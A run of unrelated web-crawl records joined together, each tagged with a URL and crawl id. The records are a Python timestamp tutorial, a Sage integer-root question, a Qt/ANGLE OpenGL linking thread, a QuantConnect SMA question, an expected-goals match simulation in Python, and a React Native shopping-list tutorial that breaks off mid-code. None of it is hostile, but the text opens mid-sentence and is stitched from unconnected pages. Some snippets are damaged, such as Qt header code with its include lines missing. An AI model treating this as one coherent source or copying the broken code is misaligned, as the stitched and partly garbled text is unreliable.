status bar, sometimes referred to as the notification bar) 21. Activities, Fragments, and Events
https://vdocuments.site/activities-fragments-and-events.html
CC-MAIN-2021-04
en
refinedweb
It's pretty common to store date and time as a timestamp in a database. A Unix timestamp is the number of seconds between a particular date and January 1, 1970 at UTC. Example 1: Python timestamp to datetime from datetime import datetime timestamp = 1545730073 dt_object = datetime.fromtimestamp(timestamp) print("dt_object =", dt_object) print("type(dt_object) =", type(dt_object)) When you run the program, the output will be: dt_object = 2018-12-25 09:27:53 type(dt_object) = <class 'datetime.datetime'> Here, we have imported the datetime class from the datetime module. Then, we used the datetime.fromtimestamp() classmethod, which returns the local date and time (a datetime object). This object is stored in the dt_object variable. Note: You can easily create a string representing date and time from a datetime object using the strftime() method. Example 2: Python datetime to timestamp You can get a timestamp from a datetime object using the datetime.timestamp() method. from datetime import datetime # current date and time now = datetime.now() timestamp = datetime.timestamp(now) print("timestamp =", timestamp)
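One caveat worth knowing: fromtimestamp() converts to your local timezone. If you want the result in UTC instead, you can pass an explicit timezone object:

from datetime import datetime, timezone

timestamp = 1545730073
dt_utc = datetime.fromtimestamp(timestamp, tz=timezone.utc)
print("dt_utc =", dt_utc)  # 2018-12-25 09:27:53+00:00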
https://www.programiz.com/python-programming/datetime/timestamp-datetime
CC-MAIN-2021-04
en
refinedweb
Reliable integer root function? Does Sage have an integer_root(x, n) function which reliably (!) returns floor(root(x,n)) for n-th roots? I think that it should be offered as a Sage function if not. This seems to work: def integer_root(x, n): return gp('sqrtnint(%d,%d)' %(x,n)) Integer n-th root of x, where x is a non-negative integer. // Related: question 10730. Edit: The answer of castor below shows a second way to define such a function: def integer_root(x, n): return ZZ(x).nth_root(n, truncate_mode=1)[0] Which version will be faster? This exists at least for square roots: it is called sqrtrem() and also provides the remainder.
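To settle the speed question empirically, one could time both definitions from a Sage session (a rough sketch; results will depend on the size of x, and note that the gp() version pays interprocess overhead for talking to PARI/GP):

# assumes both integer_root definitions above are available in a Sage session
x = 10^100
timeit("ZZ(x).nth_root(3, truncate_mode=1)[0]")   # pure Sage n-th root
timeit("gp('sqrtnint(%d,%d)' % (x, 3))")          # PARI/GP via the pexpect interface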
https://ask.sagemath.org/question/30375/reliable-integer-root-function/?sort=votes
CC-MAIN-2021-04
en
refinedweb
[Solved] Qt and ANGLE woes Hi guys, I'm trying to combine qt with some direct opengl functions on windows. The project compiles fine but when it comes to linking I get all the __imp_glblablabla errors. On other platforms I can just link in the opengl library and it runs fine; I want to do the same on windows with the standard packaged ANGLE version. I could link in libangle I'm guessing but I'm sure qt has a better way of doing this? Any tips? Kind Regards, Martell Malone Edit: forgot to mention I'm on qt5 and I'm using gles functions - sierdzio Moderators last edited by Compile Qt5 yourself with "-desktop opengl" flag passed to configure. This way Angle will not be used at all (but you need to ensure users will have an OpenGL driver installed). Hi sierdzio, I've done that already but I'm using GLES functions so I'll have to change up the code. The problem here is that I want it to use ANGLE. I was just wondering if qt5 exposes opengl functions to us. The headers are there but link time is where the errors occur. The reason being is that I'm creating a qt version of the cocos2d-x game engine with directx for windows. I had a look at qgl.h and qglinked.h in quake3 but couldn't get that to work. Here is my header atm @ #ifndef CCGL_H #define CCGL_H #endif // CCGL_H @ here is a typical error I receive. note that this is not on compiling the cocoslib itself but when linking it to an exe (e.g. a game) cocos2dx.lib(CCTexturePVR.cpp.obj) : error LNK2019: unresolved external symbol __imp__glGetError@0 referenced in function "private: bool __thiscall cocos2d::CCTexturePVR::createGLTexture(void)" (?createGLTexture@CCTexturePVR@cocos2d@@AAE_NXZ) also I noticed this as I had an OpenGL GLEW version of this header but I don't know if it is relevant although it does say it exposes opengl functions Many Thanks Martell Malone Sorry if I'm being dumb. You said you compiled Qt using -opengl desktop but then you go on to say that you wish to use ANGLE. Which do you want to use? - sierdzio Moderators last edited by "ZapB": is maintainer for OpenGL stuff, IIRC. Please ping him (hope he does not mind), I'm not using OpenGL directly in my projects, so I can't help much more. Edit seems I was a tad too late ;) Sorry Zap about the confusion. I want to use angle. I first tried compiling qt with -opengl desktop but then it won't compile because I'm using GLES headers. I then changed the header to the opengl version of cocos which requires glew. I then got a load of redefine errors which you probably have seen before. So the best solution for me is to use ANGLE for now until qt makes including glew unnecessary. On that note... Is there a define I can use to detect if angle is being used? #ifdef USING_ANGLE or something of that sort? That way at a later point I can support both versions. Hope that makes sense :) Thanks sierdzio I sent him a pm earlier :) OK then. First thing, forget about the existence of ANGLE ;) It's an implementation detail in this case. What you are really saying is that you want to use OpenGL ES 2. You can just use the pre-compiled release packages for Qt5 in this case. No need to build your own. To be able to use OpenGL ES 2 functions just #include <qopengl.h> and if that doesn't get you access to them you can get a pointer to a QOpenGLFunctions object from the QOpenGLContext::functions() function. This object contains member functions for the remainder of the ES 2 functions - well I think it catches them all.
To answer your other question about a #define to conditionally compile code you need something like: @ #include <qopengl.h> #ifdef QT_OPENGL #ifdef QT_OPENGL_ES_2 // OpenGL ES 2 code goes here #else // Desktop OpenGL code goes here #endif #endif @ By the way, the gerrit patch you linked to above can still be applied cleanly on top of the Qt 5.0.0 release (I think). I will be pushing a new version of that patch series soon (maybe this weekend if I get time between kids and decorating) ;) Hope this helps! Man you guys at the qt are fast to reply. :) Thanks ZapB this should get me back on the road to a linked library xD I'll post back if I run into any other qt related issues. Hopefully something like this should work. @ #ifndef CCGL_H #define CCGL_H #include <qopengl.h> #ifdef QT_OPENGL #ifdef QT_OPENGL_ES #ifdef Q_OS_SYMBIAN #define GL_DEPTH24_STENCIL8_OES 0x88F0 #endif #else #define CC_GL_DEPTH24_STENCIL8 GL_DEPTH24_STENCIL8 #define ccglOrtho glOrtho #define ccglClearDepth glClearDepth #define ccglTranslate glTranslated #define ccglGenerateMipmap glGenerateMipmap #define ccglGenFramebuffers glGenFramebuffers #define ccglBindFramebuffer glBindFramebuffer #define ccglFramebufferTexture2D glFramebufferTexture2D #define ccglDeleteFramebuffers glDeleteFramebuffers #define ccglCheckFramebufferStatus glCheckFramebufferStatus #define ccglFrustum glFrustum #define ccglGenBuffers glGenBuffers #define ccglBindBuffer glBindBuffer #define ccglBufferData glBufferData #define ccglBufferSubData glBufferSubData #define ccglDeleteBuffers glDeleteBuffers #define ccglglPointSizePointer glPointSizePointer #define CC_GL_FRAMEBUFFER GL_FRAMEBUFFER #define CC_GL_FRAMEBUFFER_BINDING GL_FRAMEBUFFER_BINDING #define CC_GL_COLOR_ATTACHMENT0 GL_COLOR_ATTACHMENT0 #define CC_GL_FRAMEBUFFER_COMPLETE GL_FRAMEBUFFER_COMPLETE #define CC_GL_POINT_SPRITE GL_POINT_SPRITE_ARB #define CC_GL_COORD_REPLACE GL_COORD_REPLACE_ARB #define CC_GL_POINT_SIZE_ARRAY GL_POINT_SIZE #include <GL/glew.h> #ifdef _WIN32 #include <GL/wglew.h> #else #include <GL/glxew.h> #endif #endif #endif #endif // CCGL_H @ You're welcome. Please note that #include <qopengl.h> already takes care of including the GLES/* headers and typedef'ing GLchar etc. for you. Open up the header to see the hoops we jump through to be nice to you guys ;) Good luck and happy hacking! Hi Zap funnily enough I just noticed that earlier. :) Unfortunately I still have link time errors. :/ Here is the implementation of the class CCTexturePVR which is in the last error in the compile log. It calls glGetError. Question: do I have to inherit some qt class to use opengl functions? That would be a very dirty way of implementing it Hmm weird. From the linker command and errors that you pasted it looks like your application/lib is not linking against libEGL.dll or libGLES2.dll which should be provided by ANGLE. Do these libraries exist under your Qt installation? Does your Makefile mention them? I notice you're using CMake and ninja. It could well be a build system issue. In CMake I have: find_package(Qt5Widgets REQUIRED) find_package(Qt5Gui REQUIRED) find_package(Qt5Core REQUIRED) find_package(Qt5OpenGL REQUIRED) set(EXTERNAL_LIBS ${Qt5Widgets_LIBRARIES} ${Qt5Gui_LIBRARIES} ${Qt5Core_LIBRARIES} ${Qt5OpenGL_LIBRARIES}) Qt5OpenGL_LIBRARIES only appears as Qt5::Opengl. I don't know how to link in libEGL or libGLES2. I don't want to do it the dirty way :) They are both in qtbase/lib; are they referenced in the cmake modules of qt? EDIT: Actually I'll do the work for this myself.
I'll create another issue if I can't solve it, because CMake probably isn't your problem to deal with, and I'm basically asking you to hold my hand at this stage lol. Thanks again dude, I think I will have it built shortly :)
https://forum.qt.io/topic/23125/solved-qt-and-angle-woes
CC-MAIN-2021-04
en
refinedweb
Hi, I am new to Python and QuantConnect. I have some questions about my development project. First, I wonder whether we can divide two equities directly in Initialize. Second, is it possible to calculate the SMA of the ratio by using self.SMA(self.ratio, .....)? Thank you. Below is the code class SMATrendAlgo(QCAlgorithm): def Initialize(self): self.period = 20 self.SetStartDate(2010, 01, 01) #Set Start Date self.SetEndDate(2015, 01, 01) #Set End Date self.SetCash(100000) #Set Strategy Cash self.spy = self.AddEquity("SPY", Resolution.Daily).value self.tlt = self.AddEquity("TLT", Resolution.Daily).value self.ratio = self.spy/self.tlt self.sma20 = self.SMA(self.ratio, 20, Resolution.Daily)
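A sketch of one way this is commonly approached (an editorial illustration based on LEAN's documented API, not an answer from the thread; it assumes QuantConnect's environment, where QCAlgorithm and the indicator classes are already in scope): AddEquity returns a Security object rather than a price, so the ratio can only be computed as data arrives, and the SMA can be maintained by updating an indicator manually in OnData:

class SMATrendAlgoSketch(QCAlgorithm):
    def Initialize(self):
        self.SetStartDate(2010, 1, 1)
        self.SetEndDate(2015, 1, 1)
        self.SetCash(100000)
        # AddEquity returns a Security; keep the Symbols for data lookups
        self.spy = self.AddEquity("SPY", Resolution.Daily).Symbol
        self.tlt = self.AddEquity("TLT", Resolution.Daily).Symbol
        # a stand-alone indicator updated by hand with each ratio value
        self.ratio_sma = SimpleMovingAverage(20)

    def OnData(self, data):
        if not (data.ContainsKey(self.spy) and data.ContainsKey(self.tlt)):
            return
        ratio = data[self.spy].Close / data[self.tlt].Close
        self.ratio_sma.Update(data.Time, ratio)
        if self.ratio_sma.IsReady:
            self.Debug("20-day SMA of SPY/TLT: {0}".format(self.ratio_sma.Current.Value))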
https://www.quantconnect.com/forum/discussion/2975/sma-and-ratio-python/
CC-MAIN-2018-51
en
refinedweb
Creating random numbers is a central part of programming – whether it is for simulations, games or models, there are a multitude of uses for random numbers. Python's Random module makes creating pseudo-random numbers incredibly simple. This article runs through the basic commands to create a random number, then looks to apply this to finding how likely you are to win based on a match's expected goals (we'll come on to what these are later). Let's import the random module and get started. import random The easiest way to get a random number is through the '.random()' operation. This will give a random number between 0 and 1. Check it out: random.random() 0.10769078951918487 A number between 0 and 1 is very useful. Essentially, it gives us a percentage that we can use to calculate chance, or to assign to a variable for calculation. Additionally, we can use it to create a random whole number by multiplying it by the maximum possible value, then truncating with 'int()'. The example here gives us a random number between 0 and 99: int(random.random()*100) 88 Alternatively to the above, we could use another feature of the Random module to create a random whole number for us – '.randint()'. We simply pass the lowest and highest possible values (inclusive) that we will allow. Let's simulate a dice roll: random.randint(1,6) 2 Applying Random to Expected Goals Great job on getting to know Random. The rest of the article applies it to expected goals, and will allow us to calculate how 'lucky' a team was based on the quality of their shots. Firstly, expected goals is a measurement of how many goals a team could have expected to score based on the shots that they took. Different models base this on different things, but most commonly, the location of the shot, the type of build-up and the foot used are compared with similar chances historically. We can then see the percentage chance of the shot becoming a goal. Knowing the expected goals, we can then use '.random()' to test how likely that score was. Let's set up our lists of shots with their expected goal values – these are all percentages represented as decimals. HomexG = [0.21,0.66,0.1,0.14,0.01] AwayxG = [0.04,0.06,0.01,0.04,0.06,0.12,0.01,0.06] The first shot for the home team had a 21% chance of being scored. Let's create a random percentage to simulate if it goes in or not. If it is less than or equal to 21%, we can say that it is scored in our simulation: if random.random()<=0.21: print("GOAL!") else: print("Missed!") Missed! As happens roughly 4 out of 5 times, this time the shot was missed. Let's run the shot 10,000 times: Goals = 0 for i in range(0,10000): if random.random()<=0.21: Goals += 1 print(Goals) 2071 So according to the xG score and our random test, if we take that shot 10,000 times, we can expect around 2071 goals (pretty much in line with the 0.21 score). In a nutshell, this is how we simulate with random numbers. Going Further: Simulating a Match with Expected Goals Rather than simulate with one number, let's apply this same test to every shot by the home and away teams. Take a look through the function below and try to understand how it applies the test above to every shot in the HomexG and AwayxG lists.
def calculateWinner(home, away): #Our match starts at 0-0 HomeGoals = 0 AwayGoals = 0 #We have a function within our function #This one runs the '.random()' test above for a list def testShots(shots): #Start goal count at 0 Goals = 0 #For each shot, if it goes in, add a goal for shot in shots: if random.random() <= shot: Goals += 1 #Finally, return the number of goals return Goals #Run the above formula for home and away lists HomeGoals = testShots(home) AwayGoals = testShots(away) #Return the score if HomeGoals > AwayGoals: print("Home Wins! {} - {}".format(HomeGoals, AwayGoals)) elif AwayGoals > HomeGoals: print("Away Wins! {} - {}".format(HomeGoals, AwayGoals)) else: print("Share of the points! {} - {}".format(HomeGoals, AwayGoals)) calculateWinner(HomexG, AwayxG) Home Wins! 1 - 0 We are now simulating a whole game based on expected goals, pretty cool! However, we are only simulating once. In order to get a proper estimate as to how likely it is that one team wins, we need to do this lots of times. Let's change our last function to simply return the result, not a user-friendly print out. We can then use this function over and over to calculate an accurate percentage chance of winning for each team. def calculateWinner(home, away): HomeGoals = 0 AwayGoals = 0 def testShots(shots): Goals = 0 for shot in shots: if random.random() <= shot: Goals += 1 return Goals HomeGoals = testShots(home) AwayGoals = testShots(away) #This is all that changes from above #We now pass a simple string, rather than ask for a print out. if HomeGoals > AwayGoals: return("home") elif AwayGoals > HomeGoals: return("away") else: return("draw") Now, let's run this function 10000 times, and work out the percentage of each result: #Run xG calculator 10000 times to test winner % def calculateChance(team1, team2): home = 0; away = 0; draw = 0; for i in range(0,10000): matchWinner = calculateWinner(team1,team2) if matchWinner == "home": home +=1 elif matchWinner == "away": away +=1 else: draw +=1 home = home/100 away = away/100 draw = draw/100 print("Over 10000 games, home wins {}%, away wins {}% and there is a draw in {}% of games.".format(home, away, draw)) calculateChance(HomexG, AwayxG) Over 10000 games, home wins 60.7%, away wins 10.16% and there is a draw in 29.14% of games. There we go! We now have a better understanding as to what result we could normally expect from these chances! Let's try a new run of expected goals – one great chance (50%) against 10 poor chances (5%). Who wins most often here? HomexG=[0.5] AwayxG=[0.05,0.05,0.05,0.05,0.05,0.05,0.05,0.05,0.05,0.05] calculateChance(HomexG, AwayxG) Over 10000 games, home wins 30.84%, away wins 23.14% and there is a draw in 46.02% of games. Interestingly, in this run the big-chance team has nearly an 8% advantage over the team that shoots loads from low-chance opportunities. Makes you think! Summary Creating random numbers is easy, whether we want a random percentage or number between 0 and 1 (.random()) or we want a random whole integer (randint()), the random module is a big help. In this article, we saw how we can apply random numbers to a simulation. If anything around the function creation or for loops was confusing here, you might want to take a read up on those. Alternatively, why not push forward with more complex data sets?
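One last practical note for anyone reproducing the percentages above: because every run draws fresh random numbers, the exact results will differ each time. Seeding the generator makes a simulation repeatable:

import random

random.seed(42)         # fix the seed so every run produces the same stream
print(random.random())  # always 0.6394267984578837 with this seed on CPython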
http://fcpython.com/python-basics/random-with-xg
CC-MAIN-2018-51
en
refinedweb
Most of the modern languages and frameworks tend to present a to-do list as their sample app. It is a great way to understand the basics of a framework, such as user interaction, basic navigation, or how to structure code. We'll start in a more pragmatic way: building a shopping list app. You will be able to develop this app in React Native code, build it for both iOS and Android, and finally install it on your phone. This way, you could not only show your friends what you built, but also understand missing features that you can build by yourself, think about user-interface improvements, and above all, motivate yourself to keep learning React Native as you feel its true potential. By the end of this chapter, you will have built a fully-functional shopping list that you can use on your phone and will have all the tools you need to create and maintain simple stateful apps. One of the most powerful features of React Native is its cross-platform capabilities; we will build our shopping list app for both iOS and Android, reusing 99% of our code. Let's take a look at how the app will look on both platforms: iOS: After adding more products, this is how it will look: Android: After adding more products, this is how it will look: The app will have a very similar user interface on both platforms, but we won't need to care much about the differences (for example, the back button on the Add a product screen), as they will be handled automatically by React Native. It is important to understand that each platform has its own user interface patterns, and it's a good practice to follow them. For example, navigation is usually handled through tabs in iOS while Android prefers a drawer menu, so we should build both navigation patterns if we want happy users on both platforms. In any case, this is only a recommendation, and any user interface pattern could be built on every platform. In later chapters, we will see how to handle two different patterns in the most effective way within the same codebase. The app comprises two screens: your shopping list and a list of the products which could be added to your shopping list. The user can navigate from the Shopping List screen to the Add a product screen through the round blue button and back through the < Back button. We will also build a clear button in the shopping list screen (the round red button) and the ability to add and remove products on the Add a product screen. We will be covering the following topics in this chapter: - Folder structure for a basic React Native project - React Native's basic CLI commands - Basic navigation - JS debugging - Live reloading - Styling with NativeBase - Lists - Basic state management - Handling events - AsyncStorage - Prompt popups - Distributing the app React Native has a very powerful CLI that we will need to install to get started with our project. To install, just run the following command in your command line (you might need to run this with sudo if you don't have enough permissions): npm install -g react-native-cli Once the installation is finished, we can start using the React Native CLI by typing react-native. To start our project, we will run the following command: react-native init --version="0.49.3" GroceriesList This command will create a basic project named GroceriesList with all the dependencies and libraries you need to build the app on iOS and Android. Once the CLI has finished installing all the packages, you should have a folder structure similar to this: The entry file for our project is index.js.
If you want to see your initial app running on a simulator, you can use React Native's CLI again: react-native run-ios or react-native run-android Provided you have Xcode or Android Studio and an Android emulator installed, you should be able to see a sample screen on your simulator after compilation: We now have everything we need to start implementing our app, but in order to easily debug and see our changes in the simulator, we need to enable two more features: remote JS debugging and live reloading. For debugging, we will use React Native Debugger, a standalone app based on the official debugger for React Native, which includes React Inspector and Redux DevTools. It can be downloaded following the instructions on its GitHub repository. For this debugger to work properly, we will need to enable Remote JS Debugging from within our app by opening a React Native development menu within the simulator by pressing command + ctrl + Z on iOS or command + M on Android. If everything goes well, we should see the following menu appear: Now, we will press two buttons: Debug Remote JS and Enable Live Reload. Once we are done with this, our development environment is up and ready to start writing React code. Our app only comprises two screens: Shopping List and Add Products. Since the state for such a simple app should be easy to manage, we won't add any library for state management (for example, Redux), as we will send the shared state through the navigation component. This should make our folder structure rather simple: We have to create an src folder where we will store all our React code. The self-created file index.js will have the following code: /*** index.js ***/ import { AppRegistry } from 'react-native'; import App from './src/main'; AppRegistry.registerComponent('GroceriesList', () => App); In short, this file imports the common root code for our app, stores it in a variable named App and later passes this variable to the AppRegistry through the registerComponent method. AppRegistry is the component to which we should register our root components. Once we do this, React Native will generate a JS bundle for our app and then run the app when it's ready by invoking AppRegistry.runApplication. Most of the code we will be writing will be placed inside the src folder. For this app, we will create our root component (main.js) in this folder, and a screens subfolder, in which we will store our two screens (ShoppingList and AddProduct). Now let's install all the initial dependencies for our app before continuing to code. In our project's root folder, we will need to run the following command: npm install Running that command will install all the basic dependencies for every React Native project. Let's now install the three packages we will be using for this specific app: npm install native-base --save npm install react-native-prompt-android --save npm install react-navigation --save Further ahead in this chapter, we will explain what each package will be used for.
Because we already installed our module for navigation ( react-navigation), we can set up and initialize our Navigation component inside our main.js file: /*** src/main.js ***/ import React from 'react'; import { StackNavigator } from 'react-navigation'; import ShoppingList from './screens/ShoppingList.js'; import AddProduct from './screens/AddProduct.js'; const Navigator = StackNavigator({ ShoppingList: { screen: ShoppingList }, AddProduct: { screen: AddProduct } }); export default class App extends React.Component { constructor() { super(); } render() { return <Navigator />; } } Our root component imports both of the screens in our app ( ShoppingList and AddProduct) and passes them to the StackNavigator function, which generates the Navigator component. Let's take a deeper look into how StackNavigator works. StackNavigator provides a way for any app to transition between screens, where each new screen is placed on top of a stack. When we request the navigation to a new screen, StackNavigator will slide the new screen from the right and place a < Back button in the upper-right corner to go back to the previous screen in iOS or, will fade in from the bottom while a new screen is placing a <- arrow to go back in Android. With the same codebase, we will trigger familiar navigation patterns in iOS and Android. StackNavigator is also really simple to use, as we only need to pass the screens in our apps as a hash map, where the keys are the names we want for our screens and the values are the imported screens as React components. The result is a <Navigator/> component which we can render to initialize our app. React Native includes a powerful way to style our components and screens using Flexbox and a CSS-like API but, for this app, we want to focus on the functionality aspect, so we will use a library including basic styled components as buttons, lists, icons, menus, forms, and many more. It can be seen as a Twitter Bootstrap for React Native. There are several popular UI libraries, NativeBase and React Native elements being the two most popular and best supported. Out of these two, we will choose NativeBase, since it's documentation is slightly clearer for beginners. You can find the detailed documentation on how NativeBase works on their website (), but we will go through the basics of installing and using some of their components in this chapter. We previously installed native-base as a dependency of our project through npm install but NativeBase includes some peer dependencies, which need to be linked and included in our iOS and Android native folders. Luckily, React Native already has a tool for finding out those dependencies and linking them; we just need to run: react-native link At this point, we have all the UI components from NativeBase fully available in our app. So, we can start building our first screen. Our first screen will contain a list of the items we need to buy, so it will contain one list item per item we need to buy, including a button to mark that item as already bought. Moreover, we need a button to navigate to the AddProduct screen, which will allow us to add products to our list. Finally, we will add a button to clear the list of products, in case we want to start a new shopping list: Let's start by creating ShoppingList.js inside the screens folder and importing all the UI components we will need from native-base and react-native (we will use an alert popup to warn the user before clearing all items). 
The main UI components we will be using are Fab (the blue and red round buttons), List, ListItem, CheckBox, Text, and Icon. To support our layout, we will be using Body, Container, Content, and Right, which are layout containers for the rest of our components. Having all these components, we can create a simple version of our ShoppingList component: /*** ShoppingList.js ***/ import React from 'react'; import { Alert } from 'react-native'; import { Body, Container, Content, Right, Text, CheckBox, List, ListItem, Fab, Icon } from 'native-base'; export default class ShoppingList extends React.Component { static navigationOptions = { title: 'My Groceries List' }; /*** Render ***/ render() { return ( <Container> <Content> <List> <ListItem> <Body> <Text>'Name of the product'</Text> </Body> <Right> <CheckBox checked={false} /> </Right> </ListItem> </List> </Content> <Fab style={{ backgroundColor: '#5067FF' }} <Icon name="add" /> </Fab> <Fab style={{ backgroundColor: 'red' }} <Icon ios="ios-remove" android="md-remove" /> </Fab> </Container> ); } } This is just a dumb component statically displaying the components we will be using on this screen. Some things to note: navigationOptionsis a static attribute which will be used by <Navigator>to configure how the navigation would behave. In our case, we want to display My Groceries List as the title for this screen. - For native-baseto do its magic, we need to use <Container>and <Content>to properly form the layout. Fabbuttons are placed outside <Content>, so they can float over the left and right-bottom corners. - Each ListItemcontains a <Body>(main text) and a <Right>(icons aligned to the right). Since we enabled Live Reload in our first steps, we should see the app reloading after saving our newly created file. All the UI elements are now in place, but they are not functional since we didn't add any state. This should be our next step. Let's add some initial state to our ShoppingList screen to populate the list with actual dynamic data. We will start by creating a constructor and setting the initial state there: /*** ShoppingList.js ***/ ... constructor(props) { super(props); this.state = { products: [{ id: 1, name: 'bread' }, { id: 2, name: 'eggs' }] }; } ... Now, we can render that state inside of <List> (inside the render method): /*** ShoppingList.js ***/ ... <List> { this.state.products.map(p => { return ( <ListItem key={p.id} > <Body> <Text style={{ color: p.gotten ? '#bbb' : '#000' }}> {p.name} </Text> </Body> <Right> <CheckBox checked={p.gotten} /> </Right> </ListItem> ); } )} </List> ... We now rely on a list of products inside our component's state, each product storing an id, a name, and gotten properties. When modifying this state, we will automatically be re-rendering the list. Now, it's time to add some event handlers, so we can modify the state at the users' command or navigate to the AddProduct screen. All the interaction with the user will happen through event handlers in React Native. Depending on the controller, we will have different events which can be triggered. The most common event is onPress, as it will be triggered every time we push a button, a checkbox, or a view in general. Let's add some onPress handlers for all the components which can be pushed in our screen: /*** ShoppingList.js ***/ ... render() { return ( <Container> <Content> <List> {this.state.products.map(p => { return ( <ListItem key={p.id} onPress={this._handleProductPress.bind(this, p)} > <Body> <Text style={{ color: p.gotten ? 
/*** ShoppingList.js ***/
...
render() {
  return (
    <Container>
      <Content>
        <List>
          {this.state.products.map(p => {
            return (
              <ListItem
                key={p.id}
                onPress={this._handleProductPress.bind(this, p)}
              >
                <Body>
                  <Text style={{ color: p.gotten ? '#bbb' : '#000' }}>
                    {p.name}
                  </Text>
                </Body>
                <Right>
                  <CheckBox
                    checked={p.gotten}
                    onPress={this._handleProductPress.bind(this, p)}
                  />
                </Right>
              </ListItem>
            );
          })}
        </List>
      </Content>
      <Fab
        style={{ backgroundColor: '#5067FF' }}
        onPress={this._handleAddProductPress.bind(this)}
      >
        <Icon name="add" />
      </Fab>
      <Fab
        style={{ backgroundColor: 'red' }}
        onPress={this._handleClearPress.bind(this)}
      >
        <Icon ios="ios-remove" android="md-remove" />
      </Fab>
    </Container>
  );
}
...

Notice we added three onPress event handlers:

- On <ListItem>, to react when the user taps a product in the list
- On <CheckBox>, to react when the user taps the checkbox icon next to each product in the list
- On both <Fab> buttons

If you know React, you probably understand why we use .bind on all our handler functions but, in case you have doubts, .bind makes sure we can use this inside the definition of our handlers as a reference to the component itself instead of the global scope. This allows us to call methods on our component, such as this.setState, or read our component's attributes, such as this.props and this.state. For the cases where the user taps a specific product, we also bind the product itself, so we can use it inside the event handler.

Now, let's define the functions that will serve as event handlers:

/*** ShoppingList.js ***/
...
_handleProductPress(product) {
  const products = this.state.products.map(p =>
    p.id === product.id ? { ...p, gotten: !p.gotten } : p
  );
  this.setState({ products });
}
...

First, let's create a handler for when the user taps a product on our shopping list or on its checkbox. We want to mark the product as gotten (or unmark it if it was already gotten), so we update the state with that product toggled accordingly.

Next, we will add a handler for the blue <Fab> button to navigate to the AddProduct screen:

/*** ShoppingList.js ***/
...
_handleAddProductPress() {
  this.props.navigation.navigate('AddProduct', {
    addProduct: product => {
      this.setState({ products: this.state.products.concat(product) });
    },
    deleteProduct: product => {
      this.setState({
        products: this.state.products.filter(p => p.id !== product.id)
      });
    },
    productsInList: this.state.products
  });
}
...

This handler uses this.props.navigation, a property automatically passed in by the Navigator component from react-navigation. This property contains a method named navigate, which receives the name of the screen to navigate to, plus an object that can be used as a lightweight shared state. In this app, we store three keys:

- addProduct: A function that lets the AddProduct screen modify the ShoppingList component's state, reflecting the addition of a new product to the shopping list.
- deleteProduct: A function that lets the AddProduct screen modify the ShoppingList component's state, reflecting the removal of a product from the shopping list.
- productsInList: A variable holding the list of products that are already on the shopping list, so the AddProduct screen knows which products were already added and can display them as "already added", preventing duplicate items.

Handling state through the navigation params should be seen as a workaround for simple apps containing a limited number of screens. In larger apps (as we will see in later chapters), a state management library, such as Redux or MobX, should be used to keep pure data separate from user interface handling.

Finally, we will add the handler for the red <Fab> button, which enables the user to clear all the items in the shopping list in case they want to start a new one:

/*** ShoppingList.js ***/
...
_handleClearPress() {
  Alert.alert('Clear all items?', null, [
    { text: 'Cancel' },
    { text: 'Ok', onPress: () => this.setState({ products: [] }) }
  ]);
}
...

We are using Alert to ask the user for confirmation before clearing all the elements on the shopping list. Once the user confirms this action, we empty the products attribute in our component's state.

Let's see how the whole component's structure looks when we put all the methods together:

/*** ShoppingList.js ***/
import React from 'react';
import { Alert } from 'react-native';
import { ... } from 'native-base';

export default class ShoppingList extends React.Component {
  static navigationOptions = {
    title: 'My Groceries List'
  };

  constructor(props) { ... }

  /*** User Actions Handlers ***/
  _handleProductPress(product) { ... }
  _handleAddProductPress() { ... }
  _handleClearPress() { ... }

  /*** Render ***/
  render() { ... }
}

The structure of a React Native component is very similar to that of a normal React component. We need to import React itself and then the components used to build up our screen. We also have several event handlers (prefixed with an underscore as a mere convention) and, finally, a render method to display our components using standard JSX. The only difference from a React web app is that we are using React Native UI components instead of DOM components.

Since the user needs to add new products to the shopping list, we will build a screen on which we can prompt the user for the name of a product and save it in the phone's storage for later use.

When building a React Native app, it's important to understand how mobile devices handle the memory used by each app. Our app shares memory with the rest of the apps on the device, so, eventually, the memory our app is using may be claimed by a different app. Therefore, we cannot rely on keeping data in memory for later use. If we want the data to be available across uses of our app, we need to save it in the device's persistent storage.

React Native offers an API to handle communication with the persistent storage on our mobile devices, and this API is the same on iOS and Android, so we can comfortably write cross-platform code. The API is named AsyncStorage, and we can use it after importing it from React Native:

import { AsyncStorage } from 'react-native';

We will only use two methods from AsyncStorage: getItem and setItem. For example, let's create, within our screen, a local function to handle the addition of a product to the full list of products:

/*** AddProduct.js ***/
...
async addNewProduct(name) {
  const newProductsList = this.state.allProducts.concat({
    name: name,
    id: Math.floor(Math.random() * 100000) // naive unique-ish id
  });
  await AsyncStorage.setItem(
    '@allProducts',
    JSON.stringify(newProductsList)
  );
  this.setState({ allProducts: newProductsList });
}
...

There are some interesting things to note here:

- We are using modern JavaScript features such as async and await to handle asynchronous calls instead of promises or callbacks. Explaining them in depth is outside the scope of this book, but it is worth learning how async and await work, as we will use them extensively throughout this book.
- Every time we add a product to allProducts, we also call AsyncStorage.setItem to permanently store the product in our device's storage.
  This action ensures that the products added by the user remain available even when the operating system clears the memory our app was using.
- We need to pass two parameters to setItem: a key and a value (getItem only needs the key). Both must be strings, which is why we use JSON.stringify when we want to store JSON-formatted data.

As we have just seen, we will be using an attribute in our component's state named allProducts, which will contain the full list of products the user can add to the shopping list. We can initialize this state inside the component's constructor to give the user a sense of what they will see on this screen, even during the first run of the app (this is a trick used by many modern apps to onboard users by faking a used state):

/*** AddProduct.js ***/
...
constructor(props) {
  super(props);
  this.state = {
    allProducts: [
      { id: 1, name: 'bread' },
      { id: 2, name: 'eggs' },
      { id: 3, name: 'paper towels' },
      { id: 4, name: 'milk' }
    ],
    productsInList: []
  };
}
...

Besides allProducts, we will also have a productsInList array, holding all the products already added to the current shopping list. This allows us to mark a product as Already in shopping list, preventing the user from adding the same product twice.

This constructor is very useful for our app's first run but, once the user has added products (and therefore saved them in persistent storage), we want those products to be displayed instead of this test data. To achieve this, we should read the saved products from AsyncStorage and set them as the initial allProducts value in our state. We will do this in componentWillMount:

/*** AddProduct.js ***/
...
async componentWillMount() {
  const savedProducts = await AsyncStorage.getItem('@allProducts');
  if (savedProducts) {
    this.setState({ allProducts: JSON.parse(savedProducts) });
  }
  this.setState({
    productsInList: this.props.navigation.state.params.productsInList
  });
}
...

We are updating the state once the screen is ready to be mounted. First, we update the allProducts value by reading it from persistent storage. Then, we update the productsInList array based on what the ShoppingList screen passed through the navigation property.

With this state, we can build our list of products that can be added to the shopping list:

/*** AddProduct.js ***/
...
render() {
  return (
    <List>
      {this.state.allProducts.map(product => {
        const productIsInList = this.state.productsInList.find(
          p => p.id === product.id
        );
        return (
          <ListItem key={product.id}>
            <Body>
